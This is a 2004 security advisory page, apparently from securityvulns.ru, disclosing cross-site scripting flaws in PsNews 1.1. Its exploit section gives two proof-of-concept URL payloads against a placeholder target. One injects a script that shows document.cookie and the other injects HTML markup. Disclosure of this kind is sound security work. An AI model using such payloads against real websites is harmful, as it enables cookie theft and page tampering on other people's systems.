Computer Security

Security Advisory: Bug XSS in PsNews 1.1
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  CGI bugs

  exploit in PHPBB 2010

  Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL    injection Vulnerability.

  ADVISORY: security hole (http response splitting) in snitz forums    2000

  ADVISORY: http response splitting in snipsnap

From:Michal Blaszczak <wacky_(at)_nicponie.org>
Date:08.09.2004
Subject:Bug XSS in PsNews 1.1



°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
*5-9-2004
*Autor: wacky
*E-mail: wacky@nicponie.org
*WWW: http://www.nicponie.org
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
-----------------------------------------------
|BugCross-Site Scripting (XSS) w PsNews 1.1 |
-----------------------------------------------

Exploit:

a)
http://[target]/index.
php?function=show_all&no=%253cscript>alert%2528document.
cookie);%253c/script>

b)
http://[target]/index.
php?function=add_kom&no=">%20<font%20size="20"%2
0color=red>%20<b>%20WackY%20%20</font>

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
http://www.nicponie.org/

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru